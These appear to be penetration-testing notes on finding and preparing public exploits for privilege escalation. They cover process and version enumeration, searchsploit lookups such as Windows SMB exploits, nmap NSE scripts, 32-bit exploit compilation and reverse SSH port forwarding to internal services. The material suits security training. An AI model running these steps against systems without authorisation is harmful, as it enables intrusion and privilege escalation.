Offline Exploit Resources

Initial Checks

Check all processes running as root, or privileged users. Try identifying the version number of the program executed.

ps aux | grep '^root^'

Try running the program with the --version or -v command line option to check the version number.

<program> --version
<program> -v

On debian-like distros, dpkg can show installed programs and their versions

dpkg -l | grep <program>

On systems using rpm, the following achieves the same

rpm -qa | grep <program>

SearchSploit

Update for most recent exploits

sudo apt update && sudo apt install exploitdb

Example checking for Windows SMB exploits

searchsploit remote smb microsoft windows

Copy exploits with -m

searchsploit -m windows/remote/48537.py

nmap NSE scripts

Example nmap command using a script

nmap --script http* -sC -sV IP

Get help on a specific script

nmap --script-help=clamav-exec.nse

Compilation

sudo apt-get install gcc-multilib

sudo apt-get install libx11-dev:i386 libx11-dev

gcc 624.c -m32 -o exploit

Port Forwarding

In some instances, a root process may be bound to an internal port through which it communicates. If the exploit cannot be run locally on the target, it's worth port forwarding to the machine. See more on this at 19.1 - Port Forwarding with Linux Tools and 20.1 - Ligolo Port Forwarding.

Check the service local port

netstat -nl

ssh -R <local-port>:127.0.0.1:<service-port> <username>@<local-machine>

Example command if forwarding to ssh through port 4444

mysql -u root -h 127.0.0.1 -P 4444